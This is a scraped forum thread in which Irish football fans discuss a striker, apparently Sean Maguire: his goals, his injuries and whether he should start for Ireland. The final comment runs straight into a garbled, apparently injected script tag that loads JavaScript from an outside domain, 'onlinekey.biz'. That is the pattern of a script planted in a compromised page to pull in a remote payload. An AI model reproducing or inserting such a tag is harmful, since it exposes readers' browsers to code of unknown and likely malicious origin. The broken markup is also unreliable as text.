Yeah, a really typical finish from him at his sharpest. Hopefully his run of injuries is over and we get a proper chance to see what he can do for Ireland.

Loved that finish. Even more impressive given how well the goalie did to close him down.

Finally a natural goalscorer among our forwards.Clap
Wings? They're only the band The Beatles could have been.

Not as far as his manager is concerned it isn't. Silly post.

Still, those eyebrows...

I can only assume he means the Ballon d’or or something because he can’t mean Ireland.

Nothing serious, bit of a blood on the Jersey, swapped Jersey and all good again. Playing well with a few half chances on his weaker left foot in the first half.

The turn around in Prestons form since Seanies return is no coincidence. The man's a star. Hopefully gets two full games at 9 against the rock and georgia and gets his account up and running for Ireland.

Start him v Luxembourg. He’s one of the few strikers we have who can play against a deep back line
You asked if I'd be anyone from history, fact or fiction, dead or alive:
I said "I'd be Tony Cascarino, circa 1995"

He should definitely start as the main striker, preferably linking with McGoldrick playing in a deeper role. I think they could prove to be a good combination.

I don't rate him very highly and certainly wouldn't be calling him that..

He's scored three goals in 18 games this season in the championship....I don't think he's the new Van Basten< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
